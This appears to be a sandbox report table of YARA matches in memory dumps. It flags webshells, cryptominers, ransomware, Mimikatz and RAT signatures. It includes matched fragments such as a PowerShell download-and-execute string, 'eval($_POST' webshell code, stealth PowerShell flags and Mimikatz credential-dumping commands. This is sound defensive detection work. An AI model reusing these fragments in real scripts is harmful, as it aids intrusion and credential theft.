00000023.00000003.6405856828.0000028BD6E61000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x6a9b9:$payload4: eval(gzuncompress(base64_decode 0x133ca:$php_short: <? 0x1840c:$php_short: <? 0x18759:$php_short: <? 0x1dbe4:$php_short: <? 0x213bb:$php_short: <? 0x22e2d:$php_short: <? 0x44033:$php_short: <? 0x4f9fa:$php_short: <? 0x4fa63:$php_short: <? 0x4facc:$php_short: <? 0x4fb35:$php_short: <? 0x4fb9e:$php_short: <? 0x7cda9:$php_short: <? 0x80b28:$php_short: <? 0x4f9fa:$php_new2: <?php 0x4fa63:$php_new2: <?php 0x4facc:$php_new2: <?php 0x4fb35:$php_new2: <?php 0x4fb9e:$php_new2: <?php
00000023.00000003.6405856828.0000028BD6E61000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x63e97:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x63ea7:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x645bd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x645ed:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x645fd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x64b67:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x64b77:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000023.00000003.6405856828.0000028BD6E61000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6341899374.0000028BD6D56000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1b8d6:$s1: stratum+tcp://
00000023.00000003.6341899374.0000028BD6D56000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6302159310.0000028BD7C4C000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6268258204.0000028BD6EA2000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x299b9:$payload4: eval(gzuncompress(base64_decode 0x3033:$php_short: <? 0xe9fa:$php_short: <? 0xea63:$php_short: <? 0xeacc:$php_short: <? 0xeb35:$php_short: <? 0xeb9e:$php_short: <? 0x3bda9:$php_short: <? 0x3fb28:$php_short: <? 0xe9fa:$php_new2: <?php 0xea63:$php_new2: <?php 0xeacc:$php_new2: <?php 0xeb35:$php_new2: <?php 0xeb9e:$php_new2: <?php
00000023.00000003.6268258204.0000028BD6EA2000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x22e97:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x22ea7:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x235bd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x235ed:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x235fd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x23b67:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x23b77:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000023.00000003.6268258204.0000028BD6EA2000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6408913892.0000028BD6EA1000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x2a9b9:$payload4: eval(gzuncompress(base64_decode 0x4033:$php_short: <? 0xf9fa:$php_short: <? 0xfa63:$php_short: <? 0xfacc:$php_short: <? 0xfb35:$php_short: <? 0xfb9e:$php_short: <? 0x3cda9:$php_short: <? 0x40b28:$php_short: <? 0xf9fa:$php_new2: <?php 0xfa63:$php_new2: <?php 0xfacc:$php_new2: <?php 0xfb35:$php_new2: <?php 0xfb9e:$php_new2: <?php
00000023.00000003.6408913892.0000028BD6EA1000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x23e97:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x23ea7:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245bd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245ed:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x245fd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x24b67:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x24b77:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000023.00000003.6408913892.0000028BD6EA1000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6273117492.0000028BD7976000.00000004.00000001.sdmp	WScriptShell_Case_Anomaly	Detects obfuscated wscript.shell commands	Florian Roth	0x1ee4d:$s1: WScript.Shell").run
00000023.00000003.6273117492.0000028BD7976000.00000004.00000001.sdmp	JoeSecurity_Voidcrypt	Yara detected Voidcrypt Ransomware	Joe Security
00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6337910603.0000028BD7708000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x17c5e:$payload_and_input1: eval(request. 0x17c5c:$tagasp_short1: <%e 0x17c81:$tagasp_short2: %> 0x17c5c:$tagasp_long13: <%ev 0xa213:$jsp4: public 0xa271:$jsp4: public
00000023.00000003.6337910603.0000028BD7708000.00000004.00000001.sdmp	webshell_asp_generic	Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file	Arnim Rupp	0x17c9b:$asp_much_sus8: WebShell 0x29d8:$asp_much_sus15: AntiVirus 0x30fc:$asp_much_sus15: AntiVirus 0x3f25:$asp_much_sus15: antivirus 0x4002:$asp_much_sus15: antivirus 0x4016:$asp_much_sus15: antivirus 0xd80f:$asp_much_sus15: Antivirus 0x17c77:$asp_much_sus18: "unsafe 0x18620:$asp_much_sus28: exploit 0x1645e:$asp_gen_sus11: "cmd.exe 0x170a5:$asp_gen_sus11: "cmd.exe 0x182f8:$asp_gen_sus12: %comspec% 0x17cc0:$asp_gen_sus25: shell_ 0x17d83:$asp_gen_obf1: "+" 0x18198:$asp_gen_obf1: "+" 0x1819d:$asp_gen_obf1: "+" 0x181a3:$asp_gen_obf1: "+" 0x181aa:$asp_gen_obf1: "+" 0x181af:$asp_gen_obf1: "+" 0x181b4:$asp_gen_obf1: "+" 0x17c5c:$tagasp_short1: <%e
00000023.00000003.6337910603.0000028BD7708000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6335572342.0000028BD6FAA000.00000004.00000001.sdmp	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x3913c:$s1: stratum+tcp://
00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x15ba8:$s1: stratum+tcp:// 0x31127:$s1: stratum+tcp://
00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	JoeSecurity_Buran	Yara detected Buran Ransomware	Joe Security
00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	JoeSecurity_Gocoder_3	Yara detected Gocoder ransomware	Joe Security
00000023.00000003.6332769584.0000028BD7B02000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1431b:$s1: stratum+tcp:// 0x3355e:$s1: stratum+tcp://
00000023.00000003.6332769584.0000028BD7B02000.00000004.00000001.sdmp	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
00000023.00000003.6330808823.0000028BD64F4000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6330808823.0000028BD64F4000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000023.00000003.6330808823.0000028BD64F4000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6286809278.0000028BD6A80000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6325684988.0000028BD66A2000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6347949598.0000028BD6FAA000.00000004.00000001.sdmp	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x35ec2:$sb1: -w hidden 0x35ecc:$sc1: -nop 0x35ed1:$se1: -ep bypass 0x13d79:$se3: -ExecutionPolicy Bypass
00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	JoeSecurity_Clop	Yara detected Clop Ransomware	Joe Security
00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	JoeSecurity_Cute	Yara detected Cute Ransomware	Joe Security
00000023.00000003.6327648470.0000028BD7D54000.00000004.00000001.sdmp	CredTheft_MSIL_ADPassHunt_2	unknown	FireEye	0x15656:$pdb1: \ADPassHunt\ 0x15667:$pdb2: \ADPassHunt.pdb 0x1567b:$s1: Usage: .\ADPassHunt.exe 0x15697:$s2: [ADA] Searching for accounts with msSFU30Password attribute 0x156d7:$s3: [ADA] Searching for accounts with userpassword attribute 0x15714:$s4: [GPP] Searching for passwords now
00000023.00000003.6327648470.0000028BD7D54000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x32be1:$s1: stratum+tcp:// 0x32c21:$s1: stratum+tcp://
00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x4ad8:$s1: stratum+tcp:// 0x556c:$s1: stratum+tcp:// 0x6918:$s1: stratum+tcp:// 0x6c40:$s1: stratum+tcp://
00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp	Trojan_Win32_PlaKeylog_B	Keylogger component	Microsoft	0x2a2dd:$hook: C6 06 FF 46 C6 06 25 0x2a2e8:$dasm_engine: 80 C9 10 88 0E 8A CA 80 E1 07 43 88 56 03 80 F9 05
00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp	DeepPanda_htran_exe	Hack Deep Panda - htran-exe	Florian Roth	0x30758:$s15: [+] OK! I Closed The Two Socket.
00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6307889726.0000028BD7137000.00000004.00000001.sdmp	hacktool_macos_keylogger_logkext	LogKext is an open source keylogger for Mac OS X, a product of FSB software.	@mimeframe	0x10fa6:$a1: logKextPassKey 0x10fd4:$b1: logKext Password: 0x10fe9:$b2: Logging controls whether the daemon is logging keystrokes (default is on). 0x10fa6:$c1: logKextPassKey
00000023.00000003.6307889726.0000028BD7137000.00000004.00000001.sdmp	webshell_php_dynamic_big	PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k	Arnim Rupp	0xabdf:$new_php2: <?php 0x5d34:$dynamic1: $if($ 0xae1b:$gen_bit_sus12: %comspec% 0x9b4f:$gen_bit_sus46: shell_ 0x3e58:$gen_bit_sus47: Shell 0x4875:$gen_bit_sus47: Shell 0x4b8b:$gen_bit_sus47: Shell 0x4e65:$gen_bit_sus47: Shell 0x4f99:$gen_bit_sus47: Shell 0x5ded:$gen_bit_sus55: e'.'l 0x7150:$gen_much_sus8: WebShell 0x737d:$gen_much_sus8: WebShell 0x8c32:$gen_much_sus8: WebShell 0xabca:$gen_much_sus8: Webshell 0x28a8:$gen_much_sus24: exploit 0x53cd:$gen_much_sus24: exploit 0x11586:$gen_much_sus24: exploit 0x115c5:$gen_much_sus24: exploit 0x120a3:$gen_much_sus24: exploit 0x120f3:$gen_much_sus24: exploit 0x725b:$gen_much_sus25: Exploit
00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	JoeSecurity_cerber	Yara detected Cerber ransomware	Joe Security
00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	WScript_Shell_PowerShell_Combo	Detects malware from Middle Eastern campaign reported by Talos	Florian Roth	0x296df:$s1: .CreateObject("WScript.Shell") 0x3748d:$s1: .CreateObject("WScript.Shell") 0x19d1d:$p1: powershell.exe 0x32fbf:$p1: powershell.exe
00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	HackTool_Samples	Hacktool	unknown	0xeace:$i: WPE-C1467211-7C89-49c5-801A-1D048E4014C4
00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x12960:$s1: stratum+tcp:// 0x1298b:$s1: stratum+tcp:// 0x13d17:$s1: stratum+tcp://
00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	MirageStrings	Mirage Identifying Strings	Seth Hardy	0xf7bb:$: Neo,welcome to the desert of real.
00000023.00000003.6320985176.0000028BD7280000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x4d2e:$opbs48: se'.(32*2) 0x576f:$php_short: <? 0x576f:$php_new2: <?php
00000023.00000003.6320985176.0000028BD7280000.00000004.00000001.sdmp	webshell_asp_obfuscated	ASP webshell obfuscated	Arnim Rupp	0x4831:$asp_obf2: u"+"n"+"s 0x4b6a:$tagasp_short1: <%e 0x4b81:$tagasp_short2: %> 0x4b6a:$tagasp_long12: <%ex 0x4172:$tagasp_long20: <scriptlanguage="vb 0x580c:$asp_payload2: eval( 0x4254:$asp_payload8: execute( 0x429e:$asp_payload8: execute( 0x4b1f:$asp_payload8: execute( 0x58a7:$asp_multi_payload_one3: .run 0x6709:$asp_multi_payload_one3: .run 0x7aaa:$asp_multi_payload_one3: .run
00000023.00000003.6320985176.0000028BD7280000.00000004.00000001.sdmp	webshell_asp_generic	Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file	Arnim Rupp	0x6359:$asp_much_sus8: Webshell 0x7fbd:$asp_much_sus8: Webshell 0x4831:$asp_much_sus39: u"+"n"+"s 0x4b7b:$asp_gen_sus10: "cmd" 0x5730:$asp_gen_sus12: %comspec% 0x40f2:$asp_gen_obf1: "+" 0x458e:$asp_gen_obf1: "+" 0x45d9:$asp_gen_obf1: "+" 0x45e4:$asp_gen_obf1: "+" 0x45ef:$asp_gen_obf1: "+" 0x4624:$asp_gen_obf1: "+" 0x462f:$asp_gen_obf1: "+" 0x463a:$asp_gen_obf1: "+" 0x466f:$asp_gen_obf1: "+" 0x467a:$asp_gen_obf1: "+" 0x4685:$asp_gen_obf1: "+" 0x46ba:$asp_gen_obf1: "+" 0x46c5:$asp_gen_obf1: "+" 0x46d0:$asp_gen_obf1: "+" 0x4705:$asp_gen_obf1: "+" 0x4710:$asp_gen_obf1: "+"
00000023.00000003.6348467864.0000028BD78B0000.00000004.00000001.sdmp	APT_Backdoor_Win_GoRat_Memory	Identifies GoRat malware in memory based on strings.	FireEye	0xabb6:$rat1: rat/modules/socks.(HTTPProxyClient).beacon 0xaa93:$rat2: rat.(Core).generateBeacon 0xaab0:$rat3: rat.gJitter 0xaabe:$rat4: rat/comms.(protectedChannel).SendCmdResponse 0xab24:$rat6: rat/modules/latlisten.(latlistensrv).handleCmd 0xab8c:$rat8: rat/modules/netsweeper.(Pinger).listen 0xabb6:$rat9: rat/modules/socks.(HTTPProxyClient).beacon 0xabe4:$rat10: rat/platforms/win/dyloader.(memoryLoader).ExecutePluginFunction 0xaa6a:$winblows: rat/platforms/win.(winblows).GetStage
00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6432796132.0000028BD7D95000.00000004.00000001.sdmp	SUSP_PowerShell_Caret_Obfuscation_2	Detects powershell keyword obfuscated with carets	Florian Roth	0x2ad91:$r2: p^ower^shell
00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6307602633.0000028BD60E4000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x32be1:$s1: stratum+tcp:// 0x32c21:$s1: stratum+tcp://
00000023.00000003.6307602633.0000028BD60E4000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	SUSP_PowerShell_IEX_Download_Combo	Detects strings found in sample from CN group repo leak in October 2018	Florian Roth	0x7e91:$x1: IEX ((new-object net.webclient).download 0x7ee4:$x1: IEX ((new-object net.webclient).download 0x7f38:$x1: IEX ((new-object net.webclient).download 0x7f99:$x1: IEX ((new-object net.webclient).download
00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	webshell_php_generic	php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings	Arnim Rupp	0xb75d:$php_short: <? 0x231b6:$php_short: <? 0x231b6:$php_new2: <?php 0x231c3:$inp4: _POST[ 0x231bd:$cpayload1: eval($ 0x27594:$cpayload1: eval(" 0x27645:$cpayload1: eval(" 0x294b2:$cpayload1: eval(f 0x368d9:$cpayload2: exec(" 0xbde8:$gen_bit_sus1: :eval} 0x6b65:$gen_bit_sus10: "cmd" 0x16529:$gen_bit_sus12: %comspec% 0x7f74:$gen_bit_sus46: shell_ 0x2f36:$gen_bit_sus47: Shell 0x2f78:$gen_bit_sus47: Shell 0x2f92:$gen_bit_sus47: Shell 0x3f2d:$gen_bit_sus47: Shell 0x1ad10:$gen_bit_sus47: Shell 0x2ae48:$gen_bit_sus47: Shell 0xd2d5:$gen_bit_sus61: /bin/sh 0x17d98:$gen_bit_sus66: whoami
00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	webshell_php_generic_eval	Generic PHP webshell which uses any eval/exec function in the same line with user input	Arnim Rupp	0x231bd:$geval: eval($_POST
00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	webshell_php_dynamic_big	PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k	Arnim Rupp	0x231b6:$new_php2: <?php 0x170db:$dynamic1: $duration($ 0x170e5:$dynamic1: $calc($ 0x17107:$dynamic1: $bytes($ 0x1710e:$dynamic1: $calc($ 0x1712e:$dynamic1: $calc($ 0x17554:$dynamic1: $nick($ 0xbde8:$gen_bit_sus1: :eval} 0x6b65:$gen_bit_sus10: "cmd" 0x16529:$gen_bit_sus12: %comspec% 0x7f74:$gen_bit_sus46: shell_ 0x2f36:$gen_bit_sus47: Shell 0x2f78:$gen_bit_sus47: Shell 0x2f92:$gen_bit_sus47: Shell 0x3f2d:$gen_bit_sus47: Shell 0x1ad10:$gen_bit_sus47: Shell 0x2ae48:$gen_bit_sus47: Shell 0xd2d5:$gen_bit_sus61: /bin/sh 0x17d98:$gen_bit_sus66: whoami 0x2108:$gen_much_sus25: Exploit 0x2237:$gen_much_sus25: Exploit
00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x231dc:$payload_and_input2: execute request( 0x231da:$tagasp_short1: <%e 0x205b8:$tagasp_short2: %> 0x231f9:$tagasp_short2: %> 0x231da:$tagasp_long12: <%ex
00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	ChinaChopper_Generic	China Chopper Webshells - PHP and ASPX	Florian Roth	0x231b8:$php: php @eval($_POST[
00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	JoeSecurity_mock	Yara detected Mock Ransomware	Joe Security
00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	APT_MAL_Sandworm_Exaramel_Configuration_Key	Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...	FR/ANSSI/SDO	0x3789c:$: odhyrfjcnfkdtslt
00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x196ae:$payload7: eval(base64_decode( 0xe7c7:$php_short: <? 0x19699:$php_short: <? 0x1a50d:$php_short: <? 0x19699:$php_new2: <?php 0x1a50d:$php_new2: <?php
00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x19764:$s1: stratum+tcp://
00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x333a3:$x1: 78 34 4E 6A 4E 63 65 44 63 79 58 48 67 0x33bae:$x1: 78 34 4E 54 4E 63 65 44 59 7A 58 48 67 0x33bbe:$x1: 78 34 4E 6A 6C 63 65 44 63 77 58 48 67
00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	REDLEAVES_DroppedFile_ImplantLoader_Starburn	Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT	USG	0x283f6:$XOR_Loop: 32 0C 3A 83 C2 02 88 0E 83 FA 08 7C 90 01 01 EB 90 01 01 BA 08 00 00 00 32 0C 3A 83 C2 02 88 0E 83 FA 10
00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	IMPLANT_5_v3	XTunnel Implant by APT28	US CERT	0x25b8c:$BYTES1: 0F AF C0 69 C0 07 00 00 00 2D 01 00 00 00 0F AF C9 39 C8 0x25bae:$BYTES1: 0F AF C0 69 C0 07 00 00 00 2D 01 00 00 00 0F AF C9 39 C8
00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x2c97c:$s1: stratum+tcp://
00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	JoeSecurity_cerber	Yara detected Cerber ransomware	Joe Security
00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	JoeSecurity_NoCry	Yara detected NoCry Ransomware	Joe Security
00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	malware_red_leaves_memory	Red Leaves C&C left in memory, use with Volatility / Rekall	David Cannings	0x2c029:$: OnlineTime= 0x2c067:$: clientpath= 0x2c076:$: serverpath=
00000023.00000003.6321698835.0000028BD64F4000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6321698835.0000028BD64F4000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000023.00000003.6321698835.0000028BD64F4000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	Hacktool_Strings_p0wnedShell	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs	Florian Roth	0x1ed6b:$x3: lsadump::dcsync
00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x1ecfc:$s1: sekurlsa::msv 0x1ece6:$s2: sekurlsa::wdigest 0x1ecbb:$s4: sekurlsa::kerberos 0x1ec62:$s5: sekurlsa::tspkg 0x1ec4c:$s6: sekurlsa::livessp 0x1ec3a:$s7: sekurlsa::ssp 0x1ec24:$s9: sekurlsa::process 0x1ec8c:$s11: sekurlsa::pth 0x1ec76:$s12: sekurlsa::tickets 0x1ecd2:$s13: sekurlsa::ekeys 0x1ebdf:$s14: sekurlsa::dpapi 0x1ebc9:$s15: sekurlsa::credman
00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x115df:$s1: stratum+tcp://
00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x2ceb:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x2efb:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x2ceb:$c1: Elevation:Administrator!new: 0x2efb:$c1: Elevation:Administrator!new: 0x2c92:$c6: ConsentPromptBehaviorAdmin 0x2ea2:$c6: ConsentPromptBehaviorAdmin
00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0xd3bb:$a1: certutil -decode
00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	Base64_PS1_Shellcode	Detects Base64 encoded PS1 Shellcode	Nick Carr, David Ledbetter	0x1dceb:$substring: AAAAYInlM 0x1dce7:$pattern1: /OiCAAAAYInlM
00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	Pupy_Backdoor	Detects Pupy backdoor	Florian Roth	0x2b289:$x4: reflective_inject_dll 0x2b289:$x8: reflective_inject_dll 0x2b289:$x9: reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits)
00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x26408:$payload7: eval(base64_decode( 0x26432:$payload7: eval(base64_decode( 0x12f50:$php_short: <? 0x19499:$php_short: <? 0x26403:$php_short: <? 0x2642c:$php_short: <? 0x26403:$php_new2: <?php 0x2642c:$php_new2: <?php
00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	JoeSecurity_Meterpreter	Yara detected Meterpreter	Joe Security
00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	JoeSecurity_RevengeRAT	Yara detected RevengeRAT	Joe Security
00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	JoeSecurity_EvilGnomeRC5Key	Yara detected Linux EvilGnome RC5 key	unknown
